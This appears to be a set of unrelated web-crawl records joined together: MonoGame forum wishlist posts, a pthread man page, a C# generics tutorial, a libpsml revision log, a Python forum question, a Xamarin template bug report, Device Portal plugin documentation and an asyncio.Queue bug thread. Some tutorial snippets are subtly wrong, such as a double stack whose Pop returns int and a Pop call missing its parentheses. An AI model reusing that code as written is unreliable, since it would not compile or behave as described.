instance). This is already available for DirectX platforms via the GraphicsDevice.Handle property.
http://community.monogame.net/t/monogame-feature-wishlist/6850?page=4
CC-MAIN-2017-39
en
refinedweb
Content-type: text/html pthread_attr_getscope - Obtains the contention scope attribute of the specified thread attributes object. DECthreads POSIX 1003.1c Library (libpthread.so) #include <pthread.h> int pthread_attr_getscope( const pthread_attr_t *attr, int *scope); Interfaces documented on this reference page conform to industry standards as follows: IEEE Std 1003.1c-1995, POSIX System Application Program Interface Address of the thread attributes object whose contention scope attribute is obtained. Receives the value of the contention scope attribute of the thread attributes object specified by attr. This routine obtains the value of the contention scope attribute of the thread attributes object specified in the attr argument and stores it in the location specified by the scope argument. The specified attributes object must already be initialized at the time this routine is called. The contention scope attribute specifies the set of threads with which a thread must compete for processing resources. The contention scope attribute specifies whether the new thread competes for processing resources only with other threads in its own process, called process contention scope, or with all threads on the system, called system contention scope. DECthreads selects at most one thread to execute on each processor at any point in time. DECthreads. The value of the contention scope attribute of a particular thread attributes object does not necessarily correspond to the actual scheduling contention scope of any existing thread in your multithreaded program. If an error condition occurs, this routine returns an integer value indicating the type of error. Possible return values are as follows: Successful completion. This routine is not supported by the implementation. None Functions: pthread_attr_init(3), pthread_attr_setscope(3) Manuals: Guide to DECthreads and Programmer's Guide delim off
https://backdrift.org/man/tru64/man3/pthread_attr_getscope.3.html
CC-MAIN-2017-39
en
refinedweb
When you design classes, you do so without a crystal ball. Classes are designed based on the available knowledge of who the consumers of the class likely could be, and the data types those developers would like to use with your class. While developing a system, you may have a need to develop a class that stores a number of items of the integer type. To meet the requirement, you write a class named Stack that provides the capability to store and access a series of integers: using System; public class Stack { int[] items; public void Push (int item) {...}; public int Pop() {...}; } Suppose that at some point in the future, there is a request for this same functionality, only the business case requires the support for the double type. This current class will not support that functionality, and some changes or additions need to be made. One option would be to make another class, one that provided support for the double type: public class DoubleStack { double[] items; public void Push (double item) {...}; public int Pop() {...}; } But doing that is not ideal. It leaves you with two classes, and the need to create others if requests to support different types arise in the future. The best case would be to have a single class that was much more flexible. In the .NET 1.x world, if you wanted to provide this flexibility, you did so using the object type: using System; public class Stack { object[] items; public void Push (object item) {...}; public int Pop() {...}; } This approach provides flexibility, but that flexibility comes at a cost. To pop an item off the stack, you needed to use typecasting, which resulted in a performance penalty: double d = (double)stack.Pop; In addition, that class allowed the capability to write and compile the code that added items of multiple types, not just those of the double type. Fortunately, with version 2.0 of the .NET Framework, Generics provide us a more palatable solution. So what are Generics? Generics are code templates that allow developers to create type-safe code without referring to specific data types. The following code shows a new generic, GenericStack<M>. Note that we use a placeholder of M in lieu of a specific type: public class GenericStack<M> { M[] items; void Push(M input) { } public M Pop() {} } The following code shows the use of GenericStack<M>. Here, two instances of the class are created, stack1 and stack2. stack1 can contain integers, whereas stack2 can contain doubles. Note that in place of M, the specific type is provided when defining the variables: class TestGenericStack { static void Main() { // Declare a stack of type int GenericStack<int> stack1 = new GenericStack<int>(); // Declare a list of type double GenericStack<double> stack2 = new GenericStack<double>(); } } This provides support for us to use the functionality for the types we know we must support today, plus the capability to support types we'll be interested in in the future. If in the future, you create a class named NewClass, you could use that with a Generic with the following code: // Declare a list of the new type GenericStack<NewClass> list3 = new GenericStack<NewClass>(); In GenericStack<M> class, M is what is called a generic-type parameter. The type specified when instantiating the GenericStack<M> in code is referred to as a type argument. In the code for the TestGenericStack class, int and double, are both examples of type arguments. In the preceding example, there was only one generic-type parameter, M. This was by choice and not because of a limitation in the .NET Framework. The use of multiple generic-type parameters is valid and supported, as can be seen in this example: class Stock<X, Y> { X identifier; Y numberOfShares; ... } Here are two examples of how this could then be used in code. In the first instance, the identifier is an int, and the number of shares a double. In the second case, the identifier is a string, and the number of shares is an int: Stock<int,double> x = new Stock<int,double>(); Stock<string,int> y = new Stock<string,int>(); In these examples, we've also used a single letter to represent our generic-type parameter. Again, this is by choice and not by requirement. In the Stock class example, X and Y could have also been IDENTIFIER and NUMBEROFSHARES. Now that you've learned the basics of generics, you may have a few questions: What if I don't want to allow just any type to be passed in, and want to make sure that only types deriving from a certain interface are used? What if I need to ensure that the type argument provided refers to a type with a public constructor? Can I use generic types in method definitions? The good news is that the answer to each of those questions is yes. There will undoubtedly be instances in which you will want to restrict the type arguments that a developer may use with the class. If, in the case of the Stock<X, Y> generic, you wanted to ensure that the type parameter provided for X was derived from IStockIdentifier, you could specify this, as shown here: public class Stock<X, Y> where X:IStockIdentifier Although this example uses a single constraint that X must derive from IStockIdentifier, additional constraints can be specified for X, as well as Y. In regard to other constraints for X, you may want to ensure that the type provided has a public default constructor. In that way if your class has a variable of type X that creates a new instance of it in code, it will be supported. By defining the class as public class Stock<X, Y> where X:new() you ensure that you can create a new instance of X within the class: X identifier = new X(); As mentioned earlier, you can specify multiple constraints. The following is an example of how to specify that the Stock class is to implement both of the constraints listed previously: public class Stock<X, Y> where X:IStockIdentifier, new() In the GenericStack<M> example, you saw that there were Push and Pop methods: Push and Pop are examples of generic methods. In that code, the generic methods are inside of generic types. It is important to note that they can also be used outside of generic types, as seen here: public class Widget { public void WidgetAction<M>(M m) {...} } Note It should be noted that attempts to cast a type parameter to the type of a specific class will not compile. This is in keeping with the purpose of genericscasting to a specific type of class would imply that the generic-type paremeter is, in fact, not generic. You may cast a type parameter, but only to an interface. Inheritance is the last area we'll cover on Generics in this chapter. Inheritance is handled in a very straightforward mannerwhen defining a new class that inherits from a generic, you must specify the type argument(s). If we were to create a class that inherited from our Stock class, it would resemble the following code: public class Stock<X,Y> {...} public class MyStock : Stock<string
http://codeidol.com/community/dotnet/generics/10169/
CC-MAIN-2017-39
en
refinedweb
I'm not sure what's happening in my code. But I'm trying the excercice in notepad++ and load it into python terminal. [code is not complete, I'm just not sure why I get this output] When I import the code it prints all the "print" after the for loop like it is in the for loop for. I assume it's because it has text[c] in one print (I have no clue why it would print the other one) and c is defined in the for-loop, but when I add it to the loop I get an "unexpected indent" Error. When I remove the last "print"-line [print "not in for loop??"] and reload the file back into python the for loop only runs once. Because this makes no sense for me. def reverse(text): new = () for x in range(1,len(text)+1): c = len(text) - x print c print "\t", text[c] print "not in for loop??" return reverse("abcd") output: 3 d not in for loop?? 2 c not in for loop?? 1 b not in for loop?? 0 a not in for loop?? Very important that your indents are 4 spaces per level of indentation. Please edit your post and format the code sample so we see the correct indentation. How to format code samples in forum posts Fix your post and ping this thread so we can return for a better look. Thank you. ok thanks. finally found the problem, I think I was using the wrong characters to have the proper formatting. I also retried the code again and now my output seems to be correct (as in it's not adding the print functions in the for-loop.) Not sure how that happened since it should be the same function I tried when I posted this. Guess I made a mistake somewhere in the code, just not sure what It could have been.
https://discuss.codecademy.com/t/7-reverse-for-loop-problem/18346/2
CC-MAIN-2017-39
en
refinedweb
It seems it is currently in progress: (sorry for the spam) I won't be doing any responses to BGFX related stuff anymore after this. Than you can count BGFX C# wrapper as another layer so you would still have more layers on the BGFX side, which would still make it slower. My criticism was that BGFX is fairly unknown and that not many people know it, so there wouldn't be many contributors, so your solution is "Thats OK"... My criticism was that BGFX doesn't support game consoles, not who supports more platforms. Vulkan also has C# bindings... it doesn't make doing the port a whole lot easier. Take it easy The C# wrapper is as simple as BGFX's interface: couple P/Invoke functions.Don't tell me it will be slower, I don't believe it. BGFX is a thin, close to the metal kind of library. BGFX has 2334 stars. Monogame has 3810. Considering Monogame is targeting a much broader audience than BGFX, that's a lot of stars. BGFX has few opened issues while Monogame has more than 700... Technicaly it's very high quality, higher than Monogame to my judgement (no offense)BGFX has build its reputation by itself, while Monogame is where it is because of XNA legacy. BGFX implements every graphics api, which means it implements the one used in game console as well.Why not just try compile it and see? Why don't you guys just look at it? I did look at it closely, I have evaluated it, and my judgement is that it's just the best graphic lib out there. Let me tell you my feeling right now: the problem you guys seem to have is not technical, but political.You had a closed mind atitude right from the beginning, and I feel like I'm fighting against the Status Quo rather than technical constrains. I think there is already a lot of work to do on monogame in its current stage to improve it and a few time for the developers. So all in all, introducing a new api is not just "put this dll instead" and all goes error free. There will certainly be problems not foreseen, and still not much time for contributors to develop and correct them.It is not eliminated. Rather it is not in the pipes for now Or someone can fork monogame and try bgfx Is this a hidden DX12 reference? Thank you @Alkher for your post.I know I have overreacted, but there are some attitudes I just can't stand.I would agree making MG more mature & stable is definitely the priority. Cheers Two small things that would make Monogame move forward a lot faster: A red colored 'Bug' label should be created in the bug tracker, and assigned to every issue corresponding to a bug. I'm surprised there isn't any, and this should overall help the community to have a transparent list of bugs. I feel like most bugs are being reported by users themselves. What would be needed is a set of official technical samples that would be used as a reference, which would cover the most use cases possible, and collect various metrics, by hardware ect... We can always create a dedicated website with such a feature... if it helped... I'd love to have a portable way to use strings without garbage collection. In the XNA times there was this: however it doesn't work on UWP, and probably won't in NET Core. No idea about Android/iOS I know this does not probably belongs to monogame, but using strings are crucial to most games, and probably #1 source to garbage collection and performance degradation (or maybe it's just my games ). Maybe into MonoGame.Extended ? I love MonoGame and using it to teach students game development skills. The one major issue that I have from a teacher/school perspective is that the installation only applies to the person logged in at the time of install (myself/admin). I would like the option to install MonoGame on a classroom computer and have students log into the computer with student (non-admin) accounts. Thanks,Scott The difficulty here is that Visual Studio templates are per-user as they live in the user's Documents directory. When Visual Studio is launched for the first time by a user, it creates the required directory structure in the user's Documents directory, including an empty ProjectTemplates directory. That is where custom templates should be installed. There are global templates in the Visual Studio installation directory in %ProgramFiles(x86)%\Microsoft Visual Studio \Common7\IDE\ProjectTemplates, so I might see if we can install MonoGame project templates in there. That would also neatly solve the issue of finding the user's Documents directory when the installer is running as administrator. (1) A test suite that does full API coverage to serve multiple purposes, regression testing, API validation, performance testing, and also serves as the ultimate code sample(2) Working MSAA(3) Tooling that leverages Monogame built with Monogame to enhance game development tooling for things like rigging, animation setup, etc.(4) More integration with the Visual Studio IDE to further enhance productivity(5) Gradual evolution of support libs under a different namespace with no changes to the core (either in namespaces or API because that's what makes Monogame a success). As for practical API tweaks to the core API, some of this can be done with overloads, some with extension methods, etc. And this next bit should be up to the community: I've noticed a few educators posting here. Why not assign your students projects that cover the basics of 3D that serve as useful gaming utilities. In the good old days of OpenGL there were samples for things like graphic primitive, texture operations, ... camera view plugins so you could visualize camera params within your running application etc., would be nice to have a monogame variant of this sort of thing. Having a bunch of these utility modules would go a long way to helping with workflow and should be a separate community initiative. My simple and small wish would be:- To have DrawLine, DrawRectangle, DrawCircle, DrawPolygon, DrawEtcpp in SpriteBatch itself- To be able to declare Fonts per Image/ Fonts per Font object instead of a file- The Standart Projects should have the Ability to use Visual Studios Image/3D Editor(i know that VS does have this feature its just plainly impossible to use, but why is beyond my understanding) That would be a wonderful feature. For the draw-routines... That's exactly why there is MonoGame.Extended.Just saying. In case the poster didn't know. Some people don't want to use a framework that works on top of MonoGame (MonoGame.Extended is named that way because it uses MonoGame, it does not actually have to do anything with MonoGame, it's like Nez), Yup. That's right cra0zy. Thanks for pointing that out.I meant to post that info in case the poster didn't know about MG.Ex; If he want's that functionality specifically in MG that's a valid request of course. I think that's an excellent idea, or maybe in some other class included in MonoGame if SpriteBatch doesn't make sense. Saw the Ex Libary already just didnt know there was this functionality in it; I installed it because i needed BitmapFonts and saw that it had new overloads for the SpriteBatch. Love to have this feature
http://community.monogame.net/t/monogame-feature-wishlist/6850?page=6
CC-MAIN-2017-39
en
refinedweb
[ ] Vassilis Virvilis commented on CXF-3526: ---------------------------------------- Looks like that I missed the documentation. Do you think that it would be possible to give a warning when that happens during deploy so the user can tell when something goes wrong from the logs and not wait the runtime to see the problem. Thanks > Aegis cannot handle nested map inheritance > ------------------------------------------ > > Key: CXF-3526 > URL: > Project: CXF > Issue Type: Bug > Components: Aegis Databinding > Affects Versions: 2.3.3 > Environment: Debian GNU/Linux tomcat 6 > Reporter: Vassilis Virvilis > Assignee: Freeman Fang > Fix For: 2.4.1, 2.3.5 > > Attachments: ws-test.tgz > > > The following code fails when trying to retrieve data with the simple fronted > public class ComplexMapResult extends > HashMap<String, Map<Integer, Integer>> { > } > // fail returns null map value > public ComplexMapResult testComplexMapResult(); > How it fails. On retrieve when I try to print the resulting matrix I get > INFO: client.TestClient.testComplexMapResult(TestClient.java:35): {key1=[#document: null]} > where I should get a valid map for the key "key1" > The following code succeeds > // success > public Map<String, Map<Integer, Integer>> testDirectComplexMapResult(); > So my guess is Aegis doesn't handle the inheritance very well. > Further more the following code succeeds > // success > public class SimpleMapResult extends HashMap<String, Integer> { > } > // success > public SimpleMapResult testSimpleMapResult(); > so that means it handles the extension when there is no nesting > I will try to attach the eclipse project for this (~7k) -- This message is automatically generated by JIRA. For more information on JIRA, see:
http://mail-archives.apache.org/mod_mbox/cxf-issues/201105.mbox/%3C149541039.42310.1306331687404.JavaMail.tomcat@hel.zones.apache.org%3E
CC-MAIN-2017-39
en
refinedweb
- Issued: - 2010-11-16 - Updated: - 2010-11-16 RHSA-2010:0891 - Security Advisory Synopsis Moderate: pam security update Type/Severity Security Advisory: Moderate Topic. Description37898 - CVE-2010-3316 pam: pam_xauth missing return value checks from setuid() and similar calls - BZ - 641335 - CVE-2010-3435 pam: pam_env and pam_mail accessing users' file with root privileges - BZ - 643043 - CVE-2010-3853 pam: pam_namespace executes namespace.init with service's environment.
https://access.redhat.com/errata/RHSA-2010:0891
CC-MAIN-2017-39
en
refinedweb
lp:libpsml Main development branch, incorporating the latest usability and format changes. - Get this branch: - bzr branch lp:libpsml Branch merges Related bugs Related blueprints Branch information - Owner: - Alberto Garcia - Status: - Development Recent revisions - 109. By Alberto Garcia on 2017-07-27 Export of ps_real_kind. Simple test. Update psml files and docs * Update the documentation of the annotation routines * Add export of ps_real_kind, and document it. * Update the psml files in examples/ * Add a very simple installation test and reference data * Update the release_notes This is a patch release tagged as libpsml-1.1.5 - 108. By Alberto Garcia on 2017-07-19 Release of libpsml-1.1.4 * Update the release_notes * Remove fossil file * Update README We follow the patch convention encoded in src/m_psml_ core.f90, which is also followed by the ps_GetLibPSMLVe rsion function, so the first 1.1 release is 1.1.4. - 107. By Alberto Garcia on 2017-07-18 Update draft preprint and CHANGES file - 106. By Alberto Garcia on 2017-07-18 Work around missing documentation for aliased types Added a section in the developer notes to explain the origin of ps_annotation_t and ps_radfunc_t. Updated front matter in top-level libpsml.md - 105. By Alberto Garcia on 2017-07-18 Add the missing documentation Wrote an overview of the functionality, with links to FORD-generated interfaces. Note that the interfaces in the code itself are lightly commented, originally in a Doxygen interface rougly compatible with FORD. This will be done progressively in future revisions of libpsml beyond the release. - 104. By Alberto Garcia on 2017-07-17 Remove old example files. Use ESL namespace in normalizer * Removed fossil files in 'examples'. * Renamed 'examples/ test_dump' to 'normalize'. In this file, use the namespace URI http:// esl.cecam. org/PSML/ ns/1.1 - 103. By Alberto Garcia on 2017-07-17 Support record-number attribute in <provenance> * The parser will add the appropriate entry in the data structures, and the dump routine will generate <provenance> elements with the 'record-number' attribute. Wrongly ordered elements in the file will trigger an error. * Update schema and API documentation in paper. - 102. By Alberto Garcia on 2017-07-17 Treatment of tails in interpolation * Tail regions might exhibit ringing with the high-order extrapolator. Upon parsing, the location of the last "zero" point (scanning backwards from the end) is encoded in the radfunc_t structure, and used as the effective cutoff point. Only in cases where the first "non-zero" is very small and sits at an "elbow" in the data there will be a bit of ringing, but it will be confined to the last interval. * The new behavior is configurable with a new routine ps_SetEvaluat orOptions which consolidates the setting of debugging, interpolator quality, and use of effective range. If procedure pointers are supported by the compiler the interpolator itself can be set by this routine. * Added an option '-t' to examples/show_psml to turn off the end-of-range processing. In this case the full range in the PSML file data will be used for interpolation. This program also generates "raw" tabular data when in "plot" mode. - 101. By Alberto Garcia on 2017-07-13 Add 'eref' attribute to slps. Provenance and char length fixes * Added support for the 'eref' attribute in semilocal potentials. * Provenance data for child elements was inserted in the wrong place in the pseudo-atom-spec hierarchy. * Increased the length of the character variables in the ps_t type to avoid setting a non-zero status flag in xmlf90's 'get_value' for long attributes. * examples/test_dump now inserts a new provenance element when dumping a ps_t object read from a PSML 1.0 file. * If the pre-processor symbol PSML_NO_OLD_API is defined, only the new API routines will be compiled in. * Updated examples/ {show_psml, getz} to use only the new API, and inserted pre-processor instructions to avoid compiling examples/ test_psml if the old API compatibility layer is not compiled in. Remove outdated programs v10tov11 and dumper. * Updated the schema and the description paper. - 100. By Alberto Garcia on 2017-07-07 Add optional energy_level attribute in the <pswf> element Branch metadata - Branch format: - Branch format 7 - Repository format: - Bazaar repository format 2a (needs bzr 1.16 or later)
https://code.launchpad.net/~albertog/libpsml/trunk
CC-MAIN-2017-39
en
refinedweb
Simple payment for Django Install django-mooch using pip and add mooch to your INSTALLED_APPS. Add a moochers app: from collections import OrderedDict from django.conf import settings from django.conf.urls import include, url from mooch.banktransfer import BankTransferMoocher from mooch.postfinance import PostFinanceMoocher from mooch.stripe import StripeMoocher from myapp.models import Thing # Inherit mooch.models.Payment app_name = 'mooch' # This is the app namespace. moochers = OrderedDict(( ('postfinance', PostFinanceMoocher( model=Thing, pspid='thing', live=False, sha1_in=settings.POSTFINANCE_SHA1_IN, sha1_out=settings.POSTFINANCE_SHA1_OUT, app_name=app_name, )), ('stripe', StripeMoocher( model=Thing, publishable_key=settings.STRIPE_PUBLISHABLE_KEY, secret_key=settings.STRIPE_SECRET_KEY, app_name=app_name, )), ('banktransfer', BankTransferMoocher( model=Thing, autocharge=True, # Mark all payments as successful. app_name=app_name, )), ] urlpatterns = [ url(r'', moocher.urls) for moocher in moochers.values() ] Include the moochers app / URLconf somewhere in your other URLconfs. Add a payment page: def pay(request, id): instance = get_object_or_404(Thing.objects.all(), id=id) return render(request, 'pay.html', { 'thing': instance, 'moochers': [ moocher.payment_form(request, instance) for moocher in moochers.values() ], }) Maybe send a confirmation mail when charges happen (an example template for this is actually included with the project). Please note that contrary to most other projects, django-mooch uses the moocher instance as sender, not the class: from mooch.mail import render_to_mail from mooch.signals import post_charge # The signal handler receives the moocher instance, the payment and # the request. def send_mail(sender, payment, request, **kwargs): render_to_mail('mooch/thanks_mail', { 'payment': payment, }, to=[payment.email]).send(fail_silently=True) # Connect the signal to our moocher instances (moochers may be used more than once on the same website): for moocher in moochers.values(): post_charge.connect(send_mail, sender=moocher) If you want to differentiate between moochers (for example to send a different mail for bank transfers, because the payment has not actually happened yet) set the sender argument when connecting as follows: # Some stuff you'll have to imagine... sorry. post_charge.connect(thank_you_mail, moochers['postfinance']) post_charge.connect(thank_you_mail, moochers['stripe']) post_charge.connect(please_pay_mail, moochers['banktransfer']) Download Files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/django-mooch/
CC-MAIN-2017-39
en
refinedweb
=== Error in new template for Forms Content Page Xaml file. Codebehind is creating an instance of class ContentPageViewModel that doesn't exist. === Steps to replicate === 1. Create a new Forms project. 2. Right-click project and add Forms Content Page Xaml file. === Expected result === Sample should create instance of class named after the file created. public fcp() { InitializeComponent(); BindingContext = new [NameOfContentPage]ViewModel(); } === Actual result === Sample creates instance of ContentPageViewModel resulting in red squigglies and the error: "The type of namespace name 'ContentPageViewModel' could not be found (are you missing a using directive or an assembly reference?)" public fcp() { InitializeComponent(); BindingContext = new ContentPageViewModel(); } Incorrect template Ignore last message - too many Bugzilla tabs open :( *** Bug 53104 has been marked as a duplicate of this bug. *** Good luck with the quick fix, cool click counter template. Just watching the Xamarin Show 17: ReactiveUI, James looks A LITTLE TIRED hahaha Created attachment 21549 [details] Attached Logs Bug is retested and verified in the below test environment: • Microsoft Visual Studio Enterprise 2017 d15rel Version 15.1 (26403.0) d15rel d15rel • Microsoft .NET Framework Version 4.6.01586 • Xamarin 4.5.0.339 (265d40a) • Xamarin.Android SDK 7.3.0.5 (40f69c3) • Xamarin.iOS and Xamarin.Mac SDK 10.10.0.4 (9245c1c) Actual Result- There is no red squiggles in added Content Page.cs file.Hence marking bug as verified. Please refer the attached gist and screencast link for bug verification reference Gist Link- Screen Cast Link- Still not fixed. I get it after doing this: 1. In Portable project Add new item... 2. Choose "Forms Content Page Xaml" 3. Click "Add" 4. Open .cs-file and "BindingContext = new ContentPageViewModel();" is still there. Hi, This will be fixed in the next stable release of Visual Studio. Thanks so much for the report. :) Pierce Boggan
https://xamarin.github.io/bugzilla-archives/52/52985/bug.html
CC-MAIN-2019-43
en
refinedweb
Write a custom plugin for Device Portal Learn how to write a UWP app that uses th Windows Device Portal to host a web page and provide diagnostic information. Starting with the Creators Update, you can use Device Portal to host your app's diagnostic interfaces. This article covers the three pieces needed to create a DevicePortalProvider for your app – the appxmanifest changes, setting up your app’s connection to the Device Portal service, and handling an incoming request. A sample app is also provided to get started (Coming soon) . Create a new UWP app project In this guide, we'll create everything in one solution for simplicity. In Microsoft Visual Studio 2019, create a new UWP app project. Go to File > New > Project and select Blank App (Windows Universal) for C#, and then click Next. In the Configure your new project dialog box. Name the project "DevicePortalProvider" and then click Create. This will be the app that contains the app service. Ensure that you choose "Windows 10 Creators Update (10.0; Build 15063)" to support. You may need to update Visual Studio or install the new SDK - see here for details. Add the devicePortalProvider extension to your package.appxmanifest file You will need to add some code to your package.appxmanifest file in order to make your app functional as a Device Portal plugin. First, add the following namespace definitions at the top of the file. Also add them to the IgnorableNamespaces attribute. <Package ... xmlns: ... In order to declare that your app is a Device Portal Provider, you need to create an app service and a new Device Portal Provider extension that uses it. Add both the windows.appService extension and the windows.devicePortalProvider extension in the Extensions element under Application. Make sure the AppServiceName attributes match in each extension. This indicates to the Device Portal service that this app service can be launched to handle requests on the handler namespace. ... <Application Id="App" Executable="$targetnametoken$.exe" EntryPoint="DevicePortalProvider.App"> ... <Extensions> <uap:Extension <uap:AppService </uap:Extension> <uap4:Extension <uap4:DevicePortalProvider </uap4:Extension> </Extensions> </Application> ... The HandlerRoute attribute references the REST namespace claimed by your app. Any HTTP requests on that namespace (implicitly followed by a wildcard) received by the Device Portal service will be sent to your app to be handled. In this case, any successfully authenticated HTTP request to <ip_address>/MyNamespace/api/* will be sent to your app. Conflicts between handler routes are settled via a "longest wins" check: whichever route matches more of the requests is selected, meaning that a request to "/MyNamespace/api/foo" will match against a provider with "/MyNamespace/api" rather than one with "/MyNamespace". Two new capabilities are required for this functionality. they must also be added to your package.appxmanifest file. ... <Capabilities> ... <Capability Name="privateNetworkClientServer" /> <rescap:Capability </Capabilities> ... Note The capability "devicePortalProvider" is restricted ("rescap"), which means you must get prior approval from the Store before your app can be published there. However, this does not prevent you from testing your app locally through sideloading. For more information about restricted capabilities, see App capability declarations. Set up your background task and WinRT Component In order to set up the Device Portal connection, your app must hook up an app service connection from the Device Portal service with the instance of Device Portal running within your app. To do this, add a new WinRT Component to your application with a class that implements IBackgroundTask. namespace MySampleProvider { // Implementing a DevicePortalConnection in a background task public sealed class SampleProvider : IBackgroundTask { //... } Make sure that its name matches the namespace and class name set up by the AppService EntryPoint ("MySampleProvider.SampleProvider"). When you make your first request to your Device Portal provider, Device Portal will stash the request, launch your app's background task, call its Run method, and pass in an IBackgroundTaskInstance. Your app then uses it to set up a DevicePortalConnection instance. // Implement background task handler with a DevicePortalConnection public void Run(IBackgroundTaskInstance taskInstance) { // Take a deferral to allow the background task to continue executing this.taskDeferral = taskInstance.GetDeferral(); taskInstance.Canceled += TaskInstance_Canceled; // Create a DevicePortal client from an AppServiceConnection var details = taskInstance.TriggerDetails as AppServiceTriggerDetails; var appServiceConnection = details.AppServiceConnection; this.devicePortalConnection = DevicePortalConnection.GetForAppServiceConnection(appServiceConnection); // Add Closed, RequestReceived handlers devicePortalConnection.Closed += DevicePortalConnection_Closed; devicePortalConnection.RequestReceived += DevicePortalConnection_RequestReceived; } There are two events that must be handled by the app to complete the request handling loop: Closed, for whenever the Device Portal service shuts down, and RequestReceived, which surfaces incoming HTTP requests and provides the main functionality of the Device Portal provider. Handle the RequestReceived event The RequestReceived event will be raised once for every HTTP request that is made on your plugin's specified Handler Route. The request handling loop for Device Portal providers is similar to that in NodeJS Express: the request and response objects are provided together with the event, and the handler responds by filling in the response object. In Device Portal providers, the RequestReceived event and its handlers use Windows.Web.Http.HttpRequestMessage and HttpResponseMessage objects. // Sample RequestReceived echo handler: respond with an HTML page including the query and some additional process information. private void DevicePortalConnection_RequestReceived(DevicePortalConnection sender, DevicePortalConnectionRequestReceivedEventArgs args) { var req = args.RequestMessage; var res = args.ResponseMessage; if (req.RequestUri.AbsolutePath.EndsWith("/echo")) { // construct an html response message string con = "<h1>" + req.RequestUri.AbsoluteUri + "</h1><br/>"; var proc = Windows.System.Diagnostics.ProcessDiagnosticInfo.GetForCurrentProcess(); con += String.Format("This process is consuming {0} bytes (Working Set)<br/>", proc.MemoryUsage.GetReport().WorkingSetSizeInBytes); con += String.Format("The process PID is {0}<br/>", proc.ProcessId); con += String.Format("The executable filename is {0}", proc.ExecutableFileName); res.Content = new HttpStringContent(con); res.Content.Headers.ContentType = new HttpMediaTypeHeaderValue("text/html"); res.StatusCode = HttpStatusCode.Ok; } //... } In this sample request handler, we first pull the request and response objects out of the args parameter, then create a string with the request URL and some additional HTML formatting. This is added into the Response object as an HttpStringContent instance. Other IHttpContent classes, such as those for "String" and "Buffer," are also allowed. The response is then set as an HTTP response and given a 200 (OK) status code. It should render as expected in the browser that made the original call. Note that when the RequestReceived event handler returns, the response message is automatically returned to the user agent: no additional "send" method is needed. Providing static content Static content can be served directly from a folder within your package, making it very easy to add a UI to your provider. The easiest way to serve static content is to create a content folder in your project that can map to a URL. Then, add a route handler in your RequestReceived event handler that detects static content routes and maps a request appropriately. if (req.RequestUri.LocalPath.ToLower().Contains("/www/")) { var filePath = req.RequestUri.AbsolutePath.Replace('/', '\\').ToLower(); filePath = filePath.Replace("\\backgroundprovider", "") try { var fileStream = Windows.ApplicationModel.Package.Current.InstalledLocation.OpenStreamForReadAsync(filePath).GetAwaiter().GetResult(); res.StatusCode = HttpStatusCode.Ok; res.Content = new HttpStreamContent(fileStream.AsInputStream()); res.Content.Headers.ContentType = new HttpMediaTypeHeaderValue("text/html"); } catch(FileNotFoundException e) { string con = String.Format("<h1>{0} - not found</h1>\r\n", filePath); con += "Exception: " + e.ToString(); res.Content = new HttpStringContent(con); res.StatusCode = HttpStatusCode.NotFound; res.Content.Headers.ContentType = new HttpMediaTypeHeaderValue("text/html"); } } Make sure that all files inside of the content folder are marked as "Content" and set to "Copy if newer" or "Copy always" in Visual Studio’s Properties menu. This ensures that the files will be inside your AppX Package when you deploy it. Using existing Device Portal resources and APIs Static content served by a Device Portal provider is served on the same port as the core Device Portal service. This means that you can reference the existing JS and CSS included with Device Portal with simple <link> and <script> tags in your HTML. In general, we suggest the use of rest.js, which wraps all the core Device Portal REST APIs in a convenient webbRest object, and the common.css file, which will allow you to style your content to fit with the rest of Device Portal's UI. You can see an example of this in the index.html page included in the sample. It uses rest.js to retrieve the device name and running processes from Device Portal. Importantly, use of the HttpPost/DeleteExpect200 methods on webbRest will automatically do the CSRF handling for you, which allows your webpage to call state-changing REST APIs. Note The static content included with Device Portal does not come with a guarantee against breaking changes. While the APIs are not expected to change often, they may, especially in the common.js and controls.js files, which your provider should not use. Debugging the Device Portal connection In order to debug your background task, you must change the way Visual Studio runs your code. Follow the steps below for debugging an app service connection to inspect how your provider is handling the HTTP requests: - From the Debug menu, select DevicePortalProvider Properties. - Under the Debugging tab, in the Start action section, select “Do not launch, but debug my code when it starts”. - Set a breakpoint in your RequestReceived handler function. Note Make sure the build architecture matches the architecture of the target exactly. If you are using a 64-bit PC, you must deploy using an AMD64 build. 4. Press F5 to deploy your app 5. Turn Device Portal off, then turn it back on so that it finds your app (only needed when you change your app manifest – the rest of the time you can simply re-deploy and skip this step). 6. In your browser, access the provider's namespace, and the breakpoint should be hit. Related topics Feedback
https://docs.microsoft.com/en-us/windows/uwp/debug-test-perf/device-portal-plugin
CC-MAIN-2019-43
en
refinedweb
Created on 2014-06-11 15:59 by vajrasky, last changed 2014-06-17 22:44 by emptysquare. This issue is now closed. import asyncio loop = asyncio.get_event_loop() q = asyncio.Queue(maxsize=1.2, loop=loop) q.put_nowait(1) q.put_nowait(1) q.put_nowait(1) q.put_nowait(1) q.put_nowait(1) .... and so on It seems counter intuitive for my innocent eyes. As comparison with the traditional queue: import queue q = queue.Queue(maxsize=1.2) q.put(1) q.put(1) q.put(1) -> blocking Here is the patch to make the behaviour consistent with its sibling. It looks strange to use a float as maxsize. I suggest to raise a TypeError in the constructor if the type is not int, or maybe to cast maxsize parameter to an int. FWIW, this can also be resolved by fixing Queue.full to do "self.qsize() >= self._maxsize" instead of "self.qsize() == self._maxsize". I generally don't like implicit casts as they break duck typing. "It looks strange to use a float as maxsize." => It is. But the float could be coming programmatically. Float value interpreted as infinity could give a shock for some people. "maybe to cast maxsize parameter to an int." => ceiling or flooring? The patch looks fine to me. New changeset ccfc13183fea by Victor Stinner in branch '3.4': Issue #21723: asyncio.Queue: support any type of number (ex: float) for the New changeset a2f115bfa513 by Victor Stinner in branch 'default': (Merge 3.4) Issue #21723: asyncio.Queue: support any type of number (ex: float) Thanks Vajrasky, I aplied your patch. Change also pushed to Tulip (changeset 3a392e5328c0).
https://bugs.python.org/issue21723
CC-MAIN-2019-43
en
refinedweb
